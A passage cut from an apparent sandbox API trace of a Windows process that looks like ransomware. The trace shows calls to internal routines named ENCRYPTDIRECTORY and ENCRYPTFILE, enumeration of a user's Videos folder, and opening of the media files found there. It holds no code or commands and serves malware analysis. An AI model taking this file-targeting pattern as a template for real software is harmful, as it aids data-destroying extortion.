lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0096.927] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2400 [0096.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0096.927] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0096.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0096.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0096.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0096.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0096.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0096.928] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0096.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0096.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0096.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0096.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0096.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0096.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0096.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0096.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e48 | out: hHeap=0x1780000) returned 1 [0096.928] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0096.928] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0096.928] FindNextFileW (in: hFindFile=0x41ac640, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x43c34c0, ftCreationTime.dwLowDateTime=0x43e23f0, ftCreationTime.dwHighDateTime=0xdf0000, ftLastAccessTime.dwLowDateTime=0xdf01c4, ftLastAccessTime.dwHighDateTime=0x1e, ftLastWriteTime.dwLowDateTime=0xdf0000, ftLastWriteTime.dwHighDateTime=0x20, nFileSizeHigh=0x43c3564, nFileSizeLow=0x43c34dc, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="", cAlternateFileName="難мńဓ+\x10")) returned 0 [0096.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e48 | out: hHeap=0x1780000) returned 1 [0096.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0096.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0096.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0096.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0096.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0096.928] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e95f0 | out: hHeap=0x1780000) returned 1 [0096.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0096.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0096.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0096.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0096.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e48 | out: hHeap=0x1780000) returned 1 [0096.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0096.929] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0096.992] FindClose (in: hFindFile=0x41ac640 | out: hFindFile=0x41ac640) returned 1 [0096.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0096.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0096.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0096.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e48 | out: hHeap=0x1780000) returned 1 [0096.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0096.992] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.993] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|96vXR96flJJML|KW4s-- cgXZEZC", cchCount1=29, lpString2="", cchCount2=0) returned 3 [0096.993] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e48 | out: hHeap=0x1780000) returned 1 [0096.993] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0096.993] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0096.993] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0096.993] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0096.993] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.993] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0096.993] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0096.993] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0096.993] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e48 | out: hHeap=0x1780000) returned 1 [0096.993] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0096.993] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0096.993] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0096.993] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0096.993] CharUpperBuffW (in: lpsz="ENCRYPTDIRECTORY", cchLength=0x10 | out: lpsz="ENCRYPTDIRECTORY") returned 0x10 [0096.993] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0096.993] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\96vXR96flJJML\\" (normalized: "c:\\users\\fd1hvy\\videos\\96vxr96fljjml")) returned 0x10 [0096.993] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\96vXR96flJJML\\*", lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc4486a0, ftCreationTime.dwHighDateTime=0x1d5e22e, ftLastAccessTime.dwLowDateTime=0x933d7700, ftLastAccessTime.dwHighDateTime=0x1d5ef87, ftLastWriteTime.dwLowDateTime=0x933d7700, ftLastWriteTime.dwHighDateTime=0x1d5ef87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca100, cFileName=".", cAlternateFileName="")) returned 0x41ac600 [0096.994] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc4486a0, ftCreationTime.dwHighDateTime=0x1d5e22e, ftLastAccessTime.dwLowDateTime=0x933d7700, ftLastAccessTime.dwHighDateTime=0x1d5ef87, ftLastWriteTime.dwLowDateTime=0x933d7700, ftLastWriteTime.dwHighDateTime=0x1d5ef87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca100, cFileName="..", cAlternateFileName="")) returned 1 [0096.994] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9cc0a970, ftCreationTime.dwHighDateTime=0x1d5e53f, ftLastAccessTime.dwLowDateTime=0xde15b0f0, ftLastAccessTime.dwHighDateTime=0x1d5eaa3, ftLastWriteTime.dwLowDateTime=0xde15b0f0, ftLastWriteTime.dwHighDateTime=0x1d5eaa3, nFileSizeHigh=0x0, nFileSizeLow=0xfb9f, dwReserved0=0x0, dwReserved1=0x43ca100, cFileName="1OjHCE.swf", cAlternateFileName="")) returned 1 [0096.994] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83dcebb0, ftCreationTime.dwHighDateTime=0x1d5e857, ftLastAccessTime.dwLowDateTime=0xef491730, ftLastAccessTime.dwHighDateTime=0x1d5e540, ftLastWriteTime.dwLowDateTime=0xef491730, ftLastWriteTime.dwHighDateTime=0x1d5e540, nFileSizeHigh=0x0, nFileSizeLow=0x4bf9, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="vJ4PRQa2pJimDueSCaM.mkv", cAlternateFileName="VJ4PRQ~1.MKV")) returned 1 [0096.994] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x43c34c0, ftCreationTime.dwLowDateTime=0x43e24a0, ftCreationTime.dwHighDateTime=0xdf0000, ftLastAccessTime.dwLowDateTime=0xdf01c4, ftLastAccessTime.dwHighDateTime=0x9, ftLastWriteTime.dwLowDateTime=0xdf0000, ftLastWriteTime.dwHighDateTime=0x20, nFileSizeHigh=0x43c3568, nFileSizeLow=0x43c34dc, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="", cAlternateFileName="礼мńဓ+\x10")) returned 0 [0096.994] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0096.994] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|1OjHCE.swf|vJ4PRQa2pJimDueSCaM.mkv", cchCount1=35, lpString2="", cchCount2=0) returned 3 [0096.994] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0096.994] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\96vXR96flJJML\\1OjHCE.swf", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9cc0a970, ftCreationTime.dwHighDateTime=0x1d5e53f, ftLastAccessTime.dwLowDateTime=0xde15b0f0, ftLastAccessTime.dwHighDateTime=0x1d5eaa3, ftLastWriteTime.dwLowDateTime=0xde15b0f0, ftLastWriteTime.dwHighDateTime=0x1d5eaa3, nFileSizeHigh=0x0, nFileSizeLow=0xfb9f, dwReserved0=0xdf0b28, dwReserved1=0x8, cFileName="1OjHCE.swf", cAlternateFileName="")) returned 0x41ac040 [0096.994] FindClose (in: hFindFile=0x41ac040 | out: hFindFile=0x41ac040) returned 1 [0096.994] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0096.994] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0096.994] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0096.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca460, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0096.995] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\96vXR96flJJML\\1OjHCE.swf" (normalized: "c:\\users\\fd1hvy\\videos\\96vxr96fljjml\\1ojhce.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0096.995] FreeLibrary (hLibModule=0x772d0000) returned 1 [0096.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0096.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea730 [0096.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0096.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0096.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0096.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0096.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0096.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0096.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0096.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0096.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0096.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0096.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0096.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0096.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eafd0 [0096.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0096.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0096.996] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0096.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0096.996] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0096.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0096.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0096.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2440 [0096.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0096.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0096.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0096.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0096.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0096.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0096.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0096.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0096.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0096.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0096.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0096.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0096.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0096.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0096.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fc8 [0096.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0096.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0096.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0096.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ec0 [0096.997] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0096.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0b8 [0096.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0096.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0096.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0096.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0b8 | out: hHeap=0x1780000) returned 1 [0096.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0096.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0096.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0096.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0096.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0096.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0096.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0096.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0096.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0096.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0096.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0096.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0096.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0096.997] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0096.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca010 [0096.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2420 [0096.997] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9fe0 [0096.997] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9fe0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0096.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fe0 | out: hHeap=0x1780000) returned 1 [0096.998] GetProcAddress (hModule=0x772d0000, lpProcName="CloseHandle") returned 0x7733eab0 [0096.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca010 | out: hHeap=0x1780000) returned 1 [0096.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0096.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0096.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0096.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0096.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0096.998] CloseHandle (hObject=0x298) returned 1 [0096.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0096.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e93c8 [0096.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0096.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f20 [0096.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0096.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0096.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0096.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0096.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0096.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0096.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0096.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fe0 [0096.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca070 [0096.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0096.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca070 | out: hHeap=0x1780000) returned 1 [0096.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0096.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fe0 | out: hHeap=0x1780000) returned 1 [0096.998] FreeLibrary (hLibModule=0x772d0000) returned 1 [0096.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0096.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0096.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ec0 | out: hHeap=0x1780000) returned 1 [0096.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0096.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ce0 | out: hHeap=0x1780000) returned 1 [0096.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0096.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0096.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0096.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0096.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0096.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0096.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0096.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fc8 | out: hHeap=0x1780000) returned 1 [0096.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0096.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f20 | out: hHeap=0x1780000) returned 1 [0096.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0096.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0096.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0096.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0096.999] PeekMessageW (in: lpMsg=0x144eebc, 